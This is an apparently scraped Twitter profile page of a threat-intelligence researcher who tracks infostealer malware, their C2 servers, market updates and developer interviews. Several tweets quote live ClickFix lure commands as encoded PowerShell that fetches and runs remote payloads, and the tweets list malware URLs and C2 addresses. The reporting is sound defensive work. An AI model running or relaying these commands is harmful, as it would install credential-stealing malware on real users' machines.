Who said what @g0njxa Twitter profile | Pikagi

Pikagi

Who said what

@g0njxa

3,132

Followers

176

Following

788

Media

2,729

Statuses

qui fa lo que pot no esta obligat a mes | donate 💸 to g0njxa.eth 💖 | Bad student, enthusiast, defo not an expert DMs are open, feel free to reach! 😼☂️🟣

Valencia, Spain 🇪🇸

Joined January 2023

Don't wanna be here? Send us removal request.

Pinned Tweet

@g0njxa

Who said what

10 months

In the past weeks I interviewed the staff from the major infostealers projects, a total of 7: Lumma,Raccoon,Meduza,Vidar,Amadey,StealC,Meta. Below you will find a short summary of this series that ends today, and also the ones who refused to talk. 👀👇

5

21

91

Last Seen Profiles

@BinorRaja

@fsmkyy

@NewsAlertsG

@GigaCryptoChad

@Studieo

@toscwa

@DLF

@denunz_ina

@lail7oob

@michi2024_

@BinorRaja

@GwendolynB71560

@RKitante

@_ParvisDornu

@bokeplokalmalam

@Bulevar_Getafe

@passvcberbayar

@kap_sportif

@bokeplokalmalam

@RoughayaMTaleb

@299sue

@yes_haru

@Barun43600263

@ozC3x0ghrGlnARU

@WorshipKiyomi

@NomNomNommNommm

@GrumpyCyclops

@rocqks

@DexterWyble

@ORUL8TXT

@foreveluvie

@soobinesperma

@cutecipiest

@PaulLassche

@ailolipure

@MrsMartin2168

@g0njxa

Who said what

1 year

Tweet media one

1

128

4

@g0njxa

Who said what

1 month

Google Chrome implemented an update that caused a major outage in cookie collection from infostealers, and users are experimenting several issues Vidar talks about the usage of "a TPM module for encryption" Vidar, Lumma and StealC are already working on this issue to fix it

Tweet media one

Tweet media two

Tweet media three

11

94

439

@g0njxa

Who said what

1 year

I mean... Dont let your archive be exposed to the public. 😅😅 #opendir http://77.91.68.78/lend/ Redline, Lumma, Warzone RAT, Meduza Stealer, Povertystealer, Formbook, Raccoon, AsyncRAT, Rhadamanthys, Smoke Loader, WhiteSnake & a miner on hashvault

Tweet media one

@banthisguy9349

Fox_threatintel

@banthisguy9349

1 year

http://77.91.68.[78/lend/?C=M;O=D #opendir with #redline

0

2

15

5

44

175

@g0njxa

Who said what

3 months

#Remcos RAT being delivered as a fake Crowdstrike Hotfix, targeting @bbva bank from: /portalintranetgrupobbva.com Delivered via Dropbox C2: 213.5.130.58:443 Detonation:

Tweet media one

Tweet media two

2

47

143

@g0njxa

Who said what

1 month

Sligthly changes on this #Lumma campaign, new frontend and payload design: powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgA1AHkAWAA5ADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0AA==

Tweet media one

Tweet media two

Tweet media three

@g0njxa

Who said what

2 months

Watch for malicious traffic on shady websites, dont paste nothing on your PC 👀 #Lumma Stealer powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGwAZQBuAGcAbwAtADIAMABjAGIANAAuAGsAeABjAGQAbgAuAGMAbwBtAC8AawBqAGQAZgBoAGUAdwBlAA== Detonation:

Tweet media one

7

19

89

1

34

105

@g0njxa

Who said what

1 month

#Lumma Stealer has just announced an update featuring app-bound cookie encryption bypass on Google Chrome, fixing the issue Full statement 🕊️

Tweet media one

Tweet media two

@g0njxa

Who said what

1 month

Google Chrome implemented an update that caused a major outage in cookie collection from infostealers, and users are experimenting several issues Vidar talks about the usage of "a TPM module for encryption" Vidar, Lumma and StealC are already working on this issue to fix it

Tweet media one

Tweet media two

Tweet media three

11

94

439

0

25

95

@g0njxa

Who said what

4 months

The #Meduza stealer has been banned from XSS forum after being accused to infect Russian individuals and failiing to provide protection to these users from being infected by the stealer. 🇷🇺 Same issues than Rhadamanthys few weeks ago.

Tweet media one

Tweet media two

Tweet media three

5

26

93

@g0njxa

Who said what

1 year

#Meduza Stealer is not dead! Search for C2 panels on @fofabot : icon_hash="-559608920" Some New panels: 193.233.133.81 146.70.161.13 77.105.147.136 185.106.94.31 212.113.116.56 89.185.85.132 95.181.173.235 95.181.173.8 95.181.173.233 89.185.85.34 👀👇

Tweet media one

Tweet media two

2

28

91

@g0njxa

Who said what

1 year

#Raccoon Stealer has been observed using a new User-Agent: GunnaWunnaBlueTips, since at least 05-13 hxxps://telegra.ph/WareHacks-Soft-04-22 C2 ⚙️ #RacconV2 #Recordbreaker 37.220.87.66 45.9.74.99 UA: GunnaWunnaBlueTips @crep1x 🙌 👇👇

Tweet card media

Analysis https://telegra.ph/WareHacks-Soft-04-22 Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

3

32

88

@g0njxa

Who said what

2 months

Watch for malicious traffic on shady websites, dont paste nothing on your PC 👀 #Lumma Stealer powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGwAZQBuAGcAbwAtADIAMABjAGIANAAuAGsAeABjAGQAbgAuAGMAbwBtAC8AawBqAGQAZgBoAGUAdwBlAA== Detonation:

Tweet media one

7

19

89

@g0njxa

Who said what

22 days

reCAPTCHA malware campaign is now abusing @Vultr S3 buckets and CDN to deliver #Lumma Stealer Detonation: Also loading another unidentified binary from /onefreex.com/api/download that only downloads with a custom User Agent:

Tweet media one

Tweet media two

Tweet media three

@g0njxa

Who said what

1 month

Sligthly changes on this #Lumma campaign, new frontend and payload design: powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgA1AHkAWAA5ADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0AA==

Tweet media one

Tweet media two

Tweet media three

1

34

105

1

23

85

@g0njxa

Who said what

1 month

FYI, an actual updated #Lumma Stealer panel /oldlumma.fun/login @ViriBack also the actual Lumma API domain /funlumma.fun (Updated at August, 17th from /apilumma1.fun)

Tweet media one

4

19

85

@g0njxa

Who said what

21 days

Quick changes on this reCAPTCHA malware campaign now abusing @digitalocean S3 buckets and CDN to still deliver #Lumma Stealer. Similar behavior, Detonation:

Tweet media one

Tweet media two

@g0njxa

Who said what

22 days

reCAPTCHA malware campaign is now abusing @Vultr S3 buckets and CDN to deliver #Lumma Stealer Detonation: Also loading another unidentified binary from /onefreex.com/api/download that only downloads with a custom User Agent:

Tweet media one

Tweet media two

Tweet media three

1

23

85

2

26

79

@g0njxa

Who said what

1 month

#Lumar stealer (not Lumma!) and also known and tracked as #PovertyStealer () is one of the next infostealers to implement a bypass to the new Google Chrome v128 cookies encryption. With some disadvantage: build needs administrator rigths

Tweet media one

Tweet media two

@g0njxa

Who said what

1 month

Google Chrome implemented an update that caused a major outage in cookie collection from infostealers, and users are experimenting several issues Vidar talks about the usage of "a TPM module for encryption" Vidar, Lumma and StealC are already working on this issue to fix it

Tweet media one

Tweet media two

Tweet media three

11

94

439

1

23

80

@g0njxa

Who said what

3 months

Lets follow with more Mac OS malware 👾🍎 A brief interview with Ping3r aka Atomic Mac OS Stealer (AMOS). The infamous original, the alleged first one. Exclusive content on #defcon32 days, because why not. Take a break, take a read! 😉👇

Tweet card media

Approaching stealers devs : a brief interview with AMOS

To completely understand what’s going on in a market that has been growing in the last years I found mandatory to know which players are…

g0njxa.medium.com

2

28

74

@g0njxa

Who said what

1 year

Anonfiles, one of the major free file storage providers that existed in the past years, has announced the end of its service and domain is now for sale @vxunderground RIP anonfiles :(

Tweet media one

2

30

68

@g0njxa

Who said what

1 month

#WhiteSnake stealer allegedly has no issue on cookie collection from the most recent Chrome 128 version as of today.

Tweet media one

@RussianPanda9xx

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 month

#MeduzaStealer is pushing out the bypass method in the test version to get cookies from Chrome 127. The pricing is still the same. Translation: 🐍🔥 Some stealer users encountered Chrome update 127, which changed the encryption for cookies by executing the process in a separate

Tweet media one

3

27

93

3

14

71

@g0njxa

Who said what

1 month

The infamous #Vidar Stealer also announced today an update to featuring his own bypass to the newest Google Chrome app-bound cookie encryption (without admin privileges) This announcement is followed after infostealers Meduza, Lumma and Lumar Full statement 👇👇

Tweet media one

Tweet media two

Tweet media three

@g0njxa

Who said what

1 month

Google Chrome implemented an update that caused a major outage in cookie collection from infostealers, and users are experimenting several issues Vidar talks about the usage of "a TPM module for encryption" Vidar, Lumma and StealC are already working on this issue to fix it

Tweet media one

Tweet media two

Tweet media three

11

94

439

0

22

69

@g0njxa

Who said what

1 year

#Raccoon Stealer has been spotted with an update! New user agent: DuckTales C2⚙️ #Recordbreaker #RaccoonV2 94.142.138.74 🇷🇺 Build is from June 19th @Gi7w0rm @crep1x 👇👇

Tweet card media

Analysis https://productkeyforfree.com Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

4

39

66

@g0njxa

Who said what

6 months

The infamous #Rhadamanthys Stealer has been banned from XSS forum after failing to provide protection to CIS countries people. Rhadamanthys was used against Russian military infrastructure (), also by some fellow traffers guys... 🫂🫡

Tweet media one

Tweet media two

Tweet media three

3

19

67

@g0njxa

Who said what

10 months

#Rhadamanthys Stealer being spread via fake KMSPico downloads /kms-full.com/install.php > /kms-product.eu > /kms-product.pro > DropBox Loaded from /176.113.115.224:6230/3178c C2: 185.130.226.143:6575 Detonation:

Tweet media one

Tweet media two

3

23

64

@g0njxa

Who said what

3 months

Never found nor seen a #StealC stealer panel but that is how it should look from inside 🤔🤔👀

Tweet media one

4

10

65

@g0njxa

Who said what

1 month

#WhiteSnake Stealer has recently announced an update featuring the creation of malicious .SLN (Visual Studio Solution files) as downloaders from a remote host in order to serve malware Full changelog statement below: 👇👇

1

25

64

@g0njxa

Who said what

24 days

The infamous #META Stealer becomes the next infostealer to claim the collection of cookies from the most updated versions of Google Chrome browser (v129) After Lumma, Lumar, Meduza, Vidar, StealC, Rhadamanthys, WhiteSnake... Who is missing?😅 Full statement 👇👇👇

Tweet media one

Tweet media two

@g0njxa

Who said what

1 month

#StealC stealer updated few days ago featuring cookie collection from updated Google Chrome browser versions. Statement 👇👇

Tweet media one

Tweet media two

1

9

37

2

18

64

@g0njxa

Who said what

1 month

#Lumma Stealer just announced an update on his method to collect cookies from the most recent Google Chrome browser. Full statement 👇

Tweet media one

Tweet media two

@g0njxa

Who said what

1 month

#Lumma Stealer has just announced an update featuring app-bound cookie encryption bypass on Google Chrome, fixing the issue Full statement 🕊️

Tweet media one

Tweet media two

0

25

95

1

18

62

@g0njxa

Who said what

11 months

I recently made an interview with #Lumma Stealer staff. Just a brief talk :) They want to say Hello, to all of us. The malware project is near to the 1st Anniversary, it's time to dive into Lumma 🕊️ Read it at:

Tweet card media

Approaching stealers devs : a brief interview with LummaC2

To completely understand what’s going on in a market that has been growing in the last years I found mandatory to know which players are…

g0njxa.medium.com

3

18

62

@g0njxa

Who said what

11 months

I made a little interview with #Meduza Stealer staff. The "Immaculate" stealer and heir to Aurora's (RIP) legacy shared a little time talking about his product. Take a look at:

Tweet card media

Approaching stealers devs : a brief interview with Meduza

To completely understand what’s going on in a market that has been growing in the last years I found mandatory to know which players are…

g0njxa.medium.com

4

15

58

@g0njxa

Who said what

10 months

You can also track the latest #Qakbot c2 servers with @fofabot jarm="21d14d00021d21d21c42d43d0000007abc6200da92c2a1b69c0a56366cbe21" && header_hash="480868286" 👇👇👇👇

Tweet media one

@V3n0mStrike

Ven0m

10 months

🔥I have some certainty that these hunting rules would help identify command and control servers. Shodan: Censys: #Qakbot

Tweet media one

Tweet media two

2

10

54

2

14

58

@g0njxa

Who said what

1 month

You still may have some curiosity about how MacOS infostealers were born and the history behind this kind of malware. After long months they exist there still was some histories to tell, so caution with your own judgements! Feel free to take a read 😉🍎:

Tweet card media

The journey into Mac OS infostealers

In the past weeks I interviewed some of the Mac OS malware operators that are most known in the wild. Mac OS infostealers are still a trend…

g0njxa.medium.com

0

12

61

@g0njxa

Who said what

1 year

The new exfiltration method used by #Lumma Stealer would be POST requests to a new endpoint at C2 servers Lets say goodbye to /c2sock & /c2conf (RIP 🙏🏼🙏🏼) New endpoint: /api act=recive_message (Configuration request) act=send_message (Exfiltration) @AnFam17 @evstykas

Tweet media one

Tweet media two

Tweet media three

7

22

57

@g0njxa

Who said what

11 months

#Rhadamanthys stealer is now offering a similar service than #Lumma : 👀 Restoration of expired Google sessions

Tweet media one

@ddd1ms

𝕯𝖒𝖎𝖙𝖗𝖞 𝕾𝖒𝖎𝖑𝖞𝖆𝖓𝖊𝖙𝖘

11 months

There is a very interesting development happening with #Lumma Stealer. Seems like they figured out a way to restore expired Google sessions.

Tweet media one

4

25

122

0

19

56

@g0njxa

Who said what

9 months

#Lumma Stealer has just been updated Featuring the partnership with "GhostSocks", a SOCKS5 manager. So it seems like Lumma Stealer will now be leveraging Socks5 proxies from victims. I don't know how this works but I believe something like other proxy malware ( #SystemBC )

Tweet media one

1

26

56

@g0njxa

Who said what

4 months

Hunting for #ClearFake / #ClickFix with @fofabot Malicious script seen in the wild leveraging the "Etherhiding" technique using ETH address () we can search for domains infected by this campaign using this addresses Hunt query:

Tweet media one

Tweet media two

@threatinsight

Threat Insight

4 months

Proofpoint threat researchers have noticed that a clever #socialengineering tactic is becoming increasingly popular amongst threat actors. The campaign tricks end users into copying and pasting malicious PowerShell scripts, ultimately installing malware.

Tweet media one

1

41

108

2

14

56

@g0njxa

Who said what

3 months

#Lumma Stealer has now opened a "Log Market" where Lumma operators (with an storefront code) can sell its own logs directly from their panel. Purchase is made through crypto deposits in BTC or ETH addresses. Currently there's ~5700 logs at sale from unkown vendors

Tweet media one

Tweet media two

Tweet media three

Tweet media four

0

18

57

@g0njxa

Who said what

25 days

Threat actors are abusing @teamguilded CDN to deliver #AsyncRAT via malicious Visual Studio Code projects on compromised GitHub accounts disguised as fake game cheats and fake Discord infostealers cc / @SquiblydooBlog @Cipher0091 Detonation: Thread 👇

Tweet media one

Tweet media two

1

20

56

@g0njxa

Who said what

1 month

Operators behind this #lumma campaign also dropped a XMR miner Detonation: After reporting to the pool, the worker was disconnected, with an amazing reward (no paid) generated of 0.00079836 XMR ($0.14) between 09/18 21:00 and 09/19 13:00 UTC profit 😎💸

Tweet media one

@vxunderground

vx-underground

1 month

Crazy Thursday. - Dr. Web, the Russian antivirus company, disclosed a breach. Dr. Web stopped sending antivirus updates September 16th. Subsequently, Dr. Web reportedly disconnected their servers from their internal network while they investigated the suspected compromise. Dr.

Tweet media one

19

64

711

2

18

56

@g0njxa

Who said what

6 months

#Lumma Stealer implemented a bot protection system, "pre-trained on screenshots of known virtual machines" 2 months ago. They now claim to have detected 483k bots avoiding 68k "garbage logs", reducing usage of HDDs and helping the world to become cleaner with less CO2 emissions

Tweet media one

Tweet media two

3

16

54

@g0njxa

Who said what

1 year

Introducing #Amadey Botnet v4, as seen in newly PrivateLoader Campaigns. http://77.91.97.162/g93kdwj3S/Login.php So far, a new GUI has been discovered and URLs are now 2 chars longer Traffic cc @Jane_0sint NEW v4 OLD v3

Tweet media one

Tweet media two

Tweet media three

Tweet media four

1

18

53

@g0njxa

Who said what

4 months

CryptoGrab, a crypto drainer service was granted with a stand in MAC Yerevan 2024, where "staff and top members" met with the people on the conference, sharing merch and some drinks 😭 First spotted by @0xneosec All photos:

Tweet media one

Tweet media two

Tweet media three

Tweet media four

7

11

51

@g0njxa

Who said what

9 months

Following the ban on XSS forum, Lockbit profile has also been banned from Exploit. reason: Ripper

Tweet media one

@azalsecurity

AzAl Security

9 months

LockbitSupp has been banned from XSS forum for not paying the 10% as requested by the admin. cc: @Jon__DiMaggio @ddd1ms @3xp0rtblog @AShukuhi @vxunderground @Cyberknow20 @uuallan @BrettCallow @BushidoToken

Tweet media one

10

41

151

4

12

51

@g0njxa

Who said what

1 year

Yayy!! 🦝 #RaccoonV2 #recordbreaker Stealer updated its user-agent. Seen via #Lgoogloader being distributed on #PrivateLoader campaigns New UA: Xmlst C2: 77.246.102[.]57 @NexusFuzzy @Gi7w0rm 👇👇 raccoon v2.3.0 is live 🦝

Analysis kj84DRLsDIxc4tnYES7OjFz5.exe (MD5: 1FB683C2CB13D0160E37F9D0EEFDA008) Malicious activity -...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

3

12

50

@g0njxa

Who said what

1 year

Something new has been spotted on YT #Redline and #Ransomware MAD HAT #MADHAT Ransom is $50 , so honest price to "protect" a data already stolen by Redline 😅 @AnFam17 @Gi7w0rm @Jane_0sint 👇👇

Tweet media one

Tweet media two

0

23

47

@g0njxa

Who said what

11 months

I made an interview with #StealC stealer owner, We talked about his malware project, and he "wishes us good luck" in our hunting. Please read it at:👀👇

Tweet card media

Approaching stealers devs : a brief interview with StealC

To completely understand what’s going on in a market that has been growing in the last years I found mandatory to know which players are…

g0njxa.medium.com

1

14

49

@g0njxa

Who said what

6 months

Seems like now #infostealers found a way to collect valuable information from Mozilla-based browsers extensions. This are new features on some known Stealers, firstly reported by #Lumma Stealer at mid April and followed, for example, by #ACR Stealer and #Vidar at the moment 👇

Tweet media one

Tweet media two

4

24

48

@g0njxa

Who said what

8 months

@ddd1ms @vxunderground actually more

0

8

47

@g0njxa

Who said what

11 months

I made an interview with #Vidar staff, The infamous Vidar stealer (at its 5th Anniversary) and I had a little talk about his malware project. They say that "there is no need to hold a grudge against us"... Read it at: 👇👇

Tweet card media

Approaching stealers devs : a brief interview with Vidar

To completely understand what’s going on in a market that has been growing in the last years I found mandatory to know which players are…

g0njxa.medium.com

1

12

49

@g0njxa

Who said what

1 month

Google Chrome browser v129 was released at September 17th, 2024, and one of the "new" features that took infostealers devs attention is the storage of CVC codes from credit cards #WhiteSnake updated recently featuring the grab of this information from browser victims.

Tweet media one

Tweet media two

Tweet media three

1

13

49

@g0njxa

Who said what

11 months

I made an interview with #Recordbreaker Stealer staff. Not many questions, just asking things about Raccoon Stealer. Will "MrBidenNeverKnow" be the next User Agent that we will find on this stealer? Take a look at: 🦝🦝🦝🦝

Tweet card media

Approaching stealers devs : a brief interview with Recordbreaker

To completely understand what’s going on in a market that has been growing in the last years I found mandatory to know which players are…

g0njxa.medium.com

5

24

47

@g0njxa

Who said what

1 year

So this seems to be something new spotted on YT! #Root Team Stealer Uploading logs at temp linx server http://5.42.66.26/ (Same behaviour as for example Darth Project Stealer) Sandbox log: http://5.42.66.26/mk7nl8q3y3.zip 👇👇

Tweet card media

Analysis https://telegra.ph/HIFIXLauncher-07-01 Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

4

15

46

@g0njxa

Who said what

6 months

Have you ever heard about #Dracula stealer? Sample: C2 - 195.10.205.74:1953 Detonation: ping @RussianPanda9xx @Jane_0sint

Tweet media one

Tweet media two

7

13

46

@g0njxa

Who said what

1 year

If you didn't noticed, some websites involved with #ClearFake #FakeUpdates campaigns seems to be sending download records to a Telegram Bot, forwarded to a Group. 46.255.201.42 - CN authenticprod[.]fr styktraffred - Group Name applemalicalo_bot - Bot user

Tweet media one

Tweet media two

Tweet media three

Tweet media four

0

14

45

@g0njxa

Who said what

3 months

#PrivateLoader now serves its builds from an FTP server. 1 - download a .zip from a compromised host (/institutodeseguros.com.pe) 2 - Zip contains a .lnk that retrieves the privateloader build .zip from FTP server 147.45.47.80 Stage 3 - Autoit loader

Tweet media one

Tweet media two

Tweet media three

11

13

45

@g0njxa

Who said what

7 months

Just been across a weird #malware campaign being spread on X via malicious ads (help!) TL showed me this ad /Andristo_88/status/1776305295263756467 which is aiming to /audacityteam.top (suspended) . Find it at archive showing the website and +👇

Tweet media one

4

16

44

@g0njxa

Who said what

1 year

Yayyy!!!! #Raccoon Stealer aka #recordbreaker has been updated. ☀️🌄🌕👀 I'm updating the User-Agents and Official Announcements Chart. @Gi7w0rm @crep1x Hunt the raccoon!!! 🦝🦝🎯🎯 Thanks, @suyog41

Tweet media one

@suyog41

Yogesh Londhe

1 year

Raccoon Stealer New User-Agent : SunShineMoonLight 24bdb92d93d301d2e58b84f4e5161909 #Raccoon #Stealer #IOC

0

4

12

2

13

44

@g0njxa

Who said what

9 months

Privateloader Rewind 2023 ⏳ +1 million unique installs in 2023🎯 A humble blog about the InstallsKey PPI service. Profiling customers, the sources of their installations and the service itself! Also available at /t.me/privateloader (🇺🇲&🇷🇺) 👇🏻👇🏻

Tweet card media

PrivateLoader: InstallsKey Rewind 2023

Privateloader is the name of a malware that was created to load othermalware families into infected machines, being used into a PPI…

g0njxa.medium.com

1

19

43

@g0njxa

Who said what

8 months

While #lockbit disruption is getting deservedly all the attention, Seems like other ransomware gangs are getting issues, talking about #Stormous ransomware 👀 Stormous #DOWN

Tweet media one

2

8

44

@g0njxa

Who said what

1 year

CHAOS is an open-source RAT (/github.com/tiagorlampert/CHAOS) that was somewhat popular and abused last year, and it's still in use! Track this on @fofabot 👇👇 fid="9BUak7FRNMoqKoJPH7v8Lw=="

Tweet media one

Tweet media two

Tweet media three

2

9

41

@g0njxa

Who said what

10 months

#WhiteSnake Stealer is now releasing an update featuring Google Cookies restoration 🍪👀 Same features after #Lumma , #Rhadamanthys , #Risepro , #Meduza , #Stealc Anyone else?😂

Tweet media one

Tweet media two

Tweet media three

Tweet media four

1

12

42

@g0njxa

Who said what

1 year

US, Canada, UK and Australia websites are compromised to serve Fortnite Spam (again) At first, TA seems to be abusing Kentico CMS Media libraries. Compromised websites includes Bing Blogs, Credit Unions, Medical Institutions and NGO's See full list!

Tweet media one

Tweet media two

Tweet media three

Tweet media four

3

14

42

@g0njxa

Who said what

1 year

hxxp://77.91.78.118/test2.bat Cute privilege scalation method dropped by #Amadey Loader It also disables any restore point from the infected host and block downloads from browsers.

Tweet media one

Tweet media two

3

10

42

@g0njxa

Who said what

1 year

Ironhost IO - BulletProof Servers joined the PrivateLoader campaign serving as a c2 since 1st November. 91.92.243.151 - ironhost[.]io Need a fast and reliable bulletproof server? Do not wait!

Tweet media one

Tweet media two

Tweet media three

Tweet media four

1

4

42

@g0njxa

Who said what

1 month

just released Safebrowsing — a new service that lets you quickly explore URLs in an isolated virtual browser 🔥 🛡️ It notifies you about threats and has a friendly interface, perfect for users with any expertise level Give it a try, it's free 👇

Tweet media one

1

13

42

@g0njxa

Who said what

2 months

A new one, still delivering #Lumma Stealer powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHYAZQByAGkAZgAuAGQAbAB2AGkAZABlAG8AcwBmAHIAZQAuAGMAbABpAGMAawAvADIAbgBkAGgAcwBvAHIAdQA= Detonation:

Tweet media one

@g0njxa

Who said what

2 months

Watch for malicious traffic on shady websites, dont paste nothing on your PC 👀 #Lumma Stealer powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGwAZQBuAGcAbwAtADIAMABjAGIANAAuAGsAeABjAGQAbgAuAGMAbwBtAC8AawBqAGQAZgBoAGUAdwBlAA== Detonation:

Tweet media one

7

19

89

3

7

41

@g0njxa

Who said what

6 months

Have you ever wondered what is going on with Vietnamese 🇻🇳 malware targeting Facebook accounts? I did, so you can get a quick overview of these threat actors activities and how they are spending (and earning) millions of $$$ Read now! 👇👀 #dropshipping

From Vietnam to United States: Malware, Fraud and Dropshipping

A quick overview on the Vietnamese cybercrime landscape, spending millions of dollars in fraud activities.

g0njxa.medium.com

4

13

42

@g0njxa

Who said what

1 year

What kind of Stealer is this? Something new? C2 ⚙️ 94.142.138.97/Up I think this stealer likes browser cookies the most Take a look! 👇👇

Tweet card media

Analysis https://productkeyforfree.com Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

5

14

40

@g0njxa

Who said what

22 days

#QuasarRAT being deployed on malicious VSCode extensions Detonation: C2: /azure-winsecure.com 154.216.20.132:6969 Source:

Tweet card media

Analysis whyareyouherewho.ru/files/1.cmd Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

@LehmannLorenz

Lorenz Lehmann

22 days

Today, my PC was nearly compromised. With just one click, I installed a malicious @code extension. Luckily, I was saved as my PC doesn't run on Windows. Hackers are getting smarter and aren't just targeting beginners. Here's how they do it and how you can protect your coins!

Tweet media one

Tweet media two

Tweet media three

218

2K

11K

1

16

41

@g0njxa

Who said what

11 months

You can also hunt #Mirai botnet C2 servers with @fofabot body_hash="331221342" 👇👇 Evidence since September 17th👀

Tweet media one

@1ZRR4H

Germán Fernández

11 months

Hunting #Mirai botnet C2 servers 👋 Shodan: Censys: Combining the results (12 C&C): 91.92.249.96 45.142.182.95 104.248.150.52 45.156.24.179 91.92.243.156 93.123.85.86 64.227.96.75 46.29.162.49 205.185.122.208 45.63.6.19

Tweet media one

Tweet media two

7

28

108

0

14

39

@g0njxa

Who said what

1 year

Fresh #BlankGrabber Python stealer () being shared on Youtube targeting users via fake Valorant Cheats. be578842ae7a7d0b51f20bac551645a6 log password "baim123" 👇👇

Tweet media one

Tweet media two

Tweet media three

Tweet media four

1

6

39

@g0njxa

Who said what

1 year

Android Botnets ain't dead! 📲 #Ermac V3.0 Botnet C2 Panel 91.215.85.213 Didn't find any information on this new version of this botnet. Previous V2 had some leak on March 2023 This was a previous C2 for StealC @0x6rss want to take a look? :)

Tweet media one

4

11

40

@g0njxa

Who said what

11 months

A few days ago, #Amadey owner and I did a brief interview. We talk about past, present and future of the infamous #Amadey Loader, one of the biggest products in the MaaS environment. Something worth a read. Please find it at:

Tweet card media

Approaching stealers devs : a brief interview with Amadey

To completely understand what’s going on in a market that has been growing in the last years I found mandatory to know which players are…

g0njxa.medium.com

2

21

39

@g0njxa

Who said what

1 year

#Lumma Stealer updated its capabilities recently. It now has the ability to load other files while executing main stealer and self deletion after that This behavior is common on other stealers like #Vidar or #recordbreaker , loading crypto clippers like #laplas . Very active.

Tweet media one

Tweet media two

4

22

40

@g0njxa

Who said what

2 months

InCrease, developer of #Amadey loader, has decided to share with me some exclusive footage of the upcoming v5 Amadey panel with the new "features, stats and FAQ". These are currently available to few Amadey beta-testers, release is scheduled to 6th anniversary on October 2024.

Tweet media one

Tweet media two

Tweet media three

1

16

40

@g0njxa

Who said what

6 months

⚠️Watch out fake AV websites sharing malware #Spynote (for android) /avast-securedownload.com @Avast #Lumma Stealer /bitdefender-app.com @Bitdefender #StealC (via Buer Loader?) /malwarebytes.pro @Malwarebytes samples and detonations below 👀

Tweet media one

Tweet media two

Tweet media three

2

16

38

@g0njxa

Who said what

7 months

Let's discover one of the "youngest" infostealers traffers teams playing bad around... Ghostbusters aka MMM Team 👻 +70k victims recorded in less than a year with +100 members disclosed, still active 👀 Absolute customization of builds and more!! 🪙👇

Tweet card media

Profiling Трафферы: GhostBusters (MMM)

In the infostealer ecosystem, there are communities of malware operators spreading its malicious builds in a daily basis, working under a…

g0njxa.medium.com

1

14

38

@g0njxa

Who said what

7 months

FYI, Last updates: Ⓜ️META - 4.5.1 (Mar 12) 📈RedLine - 30 (Feb 22) 🕊️Lumma - Apr 10 🦝Raccoon - 2.3.1.1 (⌛️?💀) 🔱Vidar - 9 (Apr 10) ⚓️StealC - 1.8.1 (Feb 23) 🐍 Meduza - 2.5.1 (Apr 3) 🤍WhiteSnake - 1.6.1.9 (Mar 20) 🐉Rhadamanthys - 0.6.0 (Feb 17) ☣️Amadey - 4.19.2 (Apr 8)

0

4

39

@g0njxa

Who said what

1 year

An unkown #stealer has been spotted on YT! C2 ⚙️ http://146.71.81.144/ Cookie Stealer, File Grabber, Crypto wallets, Password managers and Screenshoots, everything POST to C2 Take a look!👇👇 Just uploaded to VT

Tweet card media

Analysis https://tinyurl.com/tr7z28fj Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

3

12

38

@g0njxa

Who said what

4 months

#StealC stealer has recently released an update (v1.9.2) featuring an "offline" version (without requests to C2, log is stored on the victim) and also a dll version allegedly copied from #Vidar Stealer This features allows StealC to be used as an enumeration / discovery tool

Tweet media one

1

9

37

@g0njxa

Who said what

1 year

@LinkedIn accounts are compromised in a daily basis to join a big SEO poisoning campaign via LinkedIn Pulses. Users are then redirected to fake malicious sites where malware is being distributed, mainly #Lumma Stealer, #Cryptbot and #AMOS for Mac Users (finally found! 🍎) 👇👇

3

12

37

@g0njxa

Who said what

21 days

Victim's IP summarization of this malware campaign: 3,213 unique victims - Top 3 (🇳🇬🇮🇳🇺🇸)

Tweet media one

@RacWatchin8872

WatchingRac

@RacWatchin8872

21 days

#Malware #FakeExtension ⏰ https://paste[.]ee/d/7BWJv⏰ First Stage: Powershell contains the second stage encrypted with AES Key: shPqUHUWix2FT774bsf1DDdHLLk0/f8fL1HysAHuu5c= IV: 5bIo7oI0RxH+S8WqSBLskg==" 🧵

Tweet media one

Tweet media two

1

11

25

0

8

38

@g0njxa

Who said what

1 year

More live #Clearfake ! This is not about RU, this is China! 🇨🇳🇨🇳 Search on @fofabot title="Google Chrome 网络浏览器" Examples: /www.updateload.live/ /ggsdown.top /update.chrome-up.com/ /y13xlt1d.xyz/ /url.drvceo.com /kcdq78.fit Check samples!

Tweet media one

Tweet media two

Tweet media three

Tweet media four

2

12

37

@g0njxa

Who said what

1 month

#StealC stealer updated few days ago featuring cookie collection from updated Google Chrome browser versions. Statement 👇👇

Tweet media one

Tweet media two

@g0njxa

Who said what

1 month

The infamous #Vidar Stealer also announced today an update to featuring his own bypass to the newest Google Chrome app-bound cookie encryption (without admin privileges) This announcement is followed after infostealers Meduza, Lumma and Lumar Full statement 👇👇

Tweet media one

Tweet media two

Tweet media three

0

22

69

1

9

37

@g0njxa

Who said what

9 months

